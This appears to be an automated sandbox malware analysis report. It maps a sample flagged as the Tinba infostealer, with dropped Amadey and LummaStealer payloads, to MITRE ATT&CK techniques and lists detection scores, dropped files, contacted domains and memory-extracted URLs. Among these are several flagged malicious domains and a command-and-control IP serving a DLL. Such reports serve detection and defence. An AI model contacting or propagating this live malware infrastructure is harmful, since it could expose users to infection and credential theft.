Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_01051204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		9_2_01051204
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_01051806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		9_2_01051806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	521 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	11 Native API	2 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	2 Bypass User Account Control	4 Obfuscated Files or Information	Security Account Manager	4 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	11 Registry Run Keys / Startup Folder	1 Extra Window Memory Injection	12 Software Packing	NTDS	2310 System Information Discovery	Distributed Component Object Model	1 Email Collection	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	2 Valid Accounts	1 DLL Side-Loading	LSA Secrets	871 Security Software Discovery	SSH	21 Input Capture	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	21 Access Token Manipulation	2 Bypass User Account Control	Cached Domain Credentials	371 Virtualization/Sandbox Evasion	VNC	3 Clipboard Data	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	212 Process Injection	1 Extra Window Memory Injection	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	1 Scheduled Task/Job	11 Masquerading	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	11 Registry Run Keys / Startup Folder	2 Valid Accounts	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	371 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	21 Access Token Manipulation	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	212 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	54%	Virustotal		Browse
file.exe	53%	ReversingLabs	Win32.Infostealer.Tinba
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	100%	Avira	TR/ATRAPS.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1015170001\fe1ffe1825.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\PK13K1G[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	88%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe	71%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Temp\1015169001\f0cbba1288.exe	88%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\1015170001\fe1ffe1825.exe	71%	ReversingLabs	Win32.Trojan.LummaStealer
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	53%	ReversingLabs	Win32.Infostealer.Tinba

Source	Detection	Scanner	Label	Link
https://sordid-snaked.cyou/api4l	100%	Avira URL Cloud	malware
https://effecterectz.xyz/api	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
example.org	93.184.215.14	true	false	high
prod.detectportal.prod.cloudops.mozgcp.net	34.107.221.82	true	false	high
services.addons.mozilla.org	151.101.193.91	true	false	high
immureprech.biz	104.21.22.222	true	false	high
deafeninggeh.biz	104.21.96.1	true	false	high
contile.services.mozilla.com	34.117.188.166	true	false	high
prod.content-signature-chains.prod.webservices.mozgcp.net	34.160.144.191	true	false	high
us-west1.prod.sumo.prod.webservices.mozgcp.net	34.149.128.2	true	false	high
ipv4only.arpa	192.0.0.170	true	false	high
prod.ads.prod.webservices.mozgcp.net	34.117.188.166	true	false	high
push.services.mozilla.com	34.107.243.93	true	false	high
www.google.com	142.250.181.132	true	false	high
star-mini.c10r.facebook.com	157.240.196.35	true	false	high
prod.classify-client.prod.webservices.mozgcp.net	35.190.72.216	true	false	high
prod.balrog.prod.cloudops.mozgcp.net	35.244.181.201	true	false	high
twitter.com	104.244.42.1	true	false	high
plus.l.google.com	142.250.181.46	true	false	high
dyna.wikimedia.org	185.15.58.224	true	false	high
prod.remote-settings.prod.webservices.mozgcp.net	34.149.100.209	true	false	high
youtube.com	142.250.181.78	true	false	high
youtube-ui.l.google.com	142.250.181.110	true	false	high
steamcommunity.com	23.55.153.106	true	false	high
reddit.map.fastly.net	151.101.65.140	true	false	high
bellflamre.click	104.21.67.145	true	true	unknown
telemetry-incoming.r53-2.services.mozilla.com	34.120.208.123	true	false	high
sordid-snaked.cyou	unknown	unknown	true	unknown
www.reddit.com	unknown	unknown	false	high
spocs.getpocket.com	unknown	unknown	false	high
awake-weaves.cyou	unknown	unknown	false	high
content-signature-2.cdn.mozilla.net	unknown	unknown	false	high
support.mozilla.org	unknown	unknown	false	high
firefox.settings.services.mozilla.com	unknown	unknown	false	high
www.youtube.com	unknown	unknown	false	high
debonairnukk.xyz	unknown	unknown	false	high
diffuculttan.xyz	unknown	unknown	true	unknown
www.facebook.com	unknown	unknown	false	high
effecterectz.xyz	unknown	unknown	true	unknown
detectportal.firefox.com	unknown	unknown	false	high
wrathful-jammy.cyou	unknown	unknown	true	unknown
shavar.services.mozilla.com	unknown	unknown	false	high
apis.google.com	unknown	unknown	false	high
www.wikipedia.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
sordid-snaked.cyou	false	high
http://185.215.113.206/	false	high
deafeninggeh.biz	false	high
http://185.215.113.206/68b591d6548ec281/nss3.dll	false	high
https://steamcommunity.com/profiles/76561199724331900	false	high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-	firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp	PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550179335.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000002.2565766446.0000000000E62000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	false		high
https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%	firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	false		high
https://merino.services.mozilla.com/api/v1/suggest	firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2614640392.000001323D1D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2607838217.000001C2B2073000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2607531192.000002713B686000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.gstatic.cn/recaptcha/	PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	false		high
https://spocs.getpocket.com/spocs	firefox.exe, 00000017.00000002.2708011983.00000132567A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2649004262.000001324D8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2648295218.000001324D7A5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://screenshots.firefox.com	firefox.exe, 00000017.00000002.2628867564.000001324B2E7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ads.stickyadstv.com/firefox-etp	firefox.exe, 00000017.00000002.2622599068.0000013249303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2653502406.000001324DED4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2655457741.000001324ECC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB07000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM	firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	false		high
https://xhr.spec.whatwg.org/#sync-warning	firefox.exe, 00000017.00000002.2659715643.000001324F1C5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sordid-snaked.cyou/api4l	PK13K1G.exe, 00000008.00000002.2562292696.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2555567301.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550286086.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.amazon.com/exec/obidos/external-search/	firefox.exe, 00000017.00000002.2622599068.0000013249326000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2519889545.000001324CD3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2519706393.000001324CD20000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2519437681.000001324CB00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2520315947.000001324CD7B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://profiler.firefox.com/	firefox.exe, 00000017.00000002.2628867564.000001324B270000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550286086.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis	PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550179335.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000002.2565766446.0000000000E62000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC	PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/mozilla-services/screenshots	firefox.exe, 00000017.00000003.2520073438.000001324CD5D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2631765675.000001324CA70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000003.2519889545.000001324CD3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2519706393.000001324CD20000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2519437681.000001324CB00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2520315947.000001324CD7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest	firefox.exe, 00000017.00000002.2638954020.000001324D350000.00000002.08000000.00040000.00000000.sdmp	false		high
https://tracking-protection-issues.herokuapp.com/new	firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=e	PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en	PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report	firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	false		high
https://firefox.settings.services.mozilla.com/v1_onDisplaySyncURIs/allKnownSender	firefox.exe, 00000017.00000002.2622599068.0000013249303000.00000004.00000800.00020000.00000000.sdmp	false		high
http://exslt.org/common	firefox.exe, 00000017.00000002.2620149903.0000013248926000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ok.ru/	firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsThe	firefox.exe, 00000017.00000002.2638954020.000001324D350000.00000002.08000000.00040000.00000000.sdmp	false		high
https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/	firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	false		high
https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullSc	firefox.exe, 00000017.00000002.2659715643.000001324F1C5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	firefox.exe, 00000017.00000002.2620149903.00000132489AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2607838217.000001C2B20C8000.00000004.00000800.00020000.00000000.sdmp, acdee533dd.exe, 0000001A.00000002.3105754755.000000000BCB1000.00000004.00000020.00020000.00000000.sdmp, acdee533dd.exe, 0000001A.00000002.3074070661.0000000001415000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2607531192.000002713B6C7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://win.mail.ru/cgi-bin/sentmsg?mailto=%s	firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2621608217.0000013248F7D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lv.queniujq.cn	PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.duckduckgo.com/ac/VALIDATE_ONCE_PER_SESSIONisWaitingReplyFromRemoteContentquery=	firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.bbc.co.uk/	firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp	false		high
https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=	firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2607531192.000002713B6C7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bugzilla.mo	firefox.exe, 00000017.00000002.2648295218.000001324D76B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2658660182.000001324F0B3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/pub	PK13K1G.exe, 00000008.00000003.2550179335.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000002.2565766446.0000000000E62000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	false		high
https://mitmdetection.services.mozilla.com/	firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	false		high
https://static.adsafeprotected.com/firefox-etp-js	firefox.exe, 00000017.00000002.2622599068.0000013249303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2655457741.000001324ECC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB07000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://checkout.steampowered.com/	PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	false		high
https://spocs.getpocket.com/	firefox.exe, 00000017.00000002.2708011983.00000132567A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2607531192.000002713B612000.00000004.00000800.00020000.00000000.sdmp	false		high
https://services.addons.mozilla.org/api/v4/abuse/report/addon/	firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	false		high
https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%	firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	false		high
https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f	firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	false		high
https://ebay.comP	firefox.exe, 00000017.00000002.2711393247.00002CEEA9F04000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.iqiyi.com/	firefox.exe, 00000017.00000002.2707167925.0000013255355000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2649004262.000001324D811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://monitor.firefox.com/user/breach-stats?includeResolved=true	firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	false		high
https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report	firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	false		high
https://bugzilla.mozilla.org/show_bug.cgi?id=1584464	firefox.exe, 00000017.00000002.2701121751.0000013254E5C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://help.steampowered.com/en/	PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://yandex.com	firefox.exe, 00000017.00000002.2711393247.00002CEEA9F04000.00000004.00000800.00020000.00000000.sdmp	false		high
https://monitor.firefox.com/about	firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	false		high
http://poczta.interia.pl/mh/?mailto=%s_injectDefaultProtocolHandlersIfNeededhandlerSvc	firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://account.bellmedia.c	firefox.exe, 00000017.00000002.2674958419.0000013250257000.00000004.00000800.00020000.00000000.sdmp	false		high
https://login.microsoftonline.com	firefox.exe, 00000017.00000002.2674958419.0000013250257000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2664047201.000001324F4DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://broadcast.st.dl.eccdnx.com	PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto	firefox.exe, 00000017.00000002.2638954020.000001324D350000.00000002.08000000.00040000.00000000.sdmp	false		high
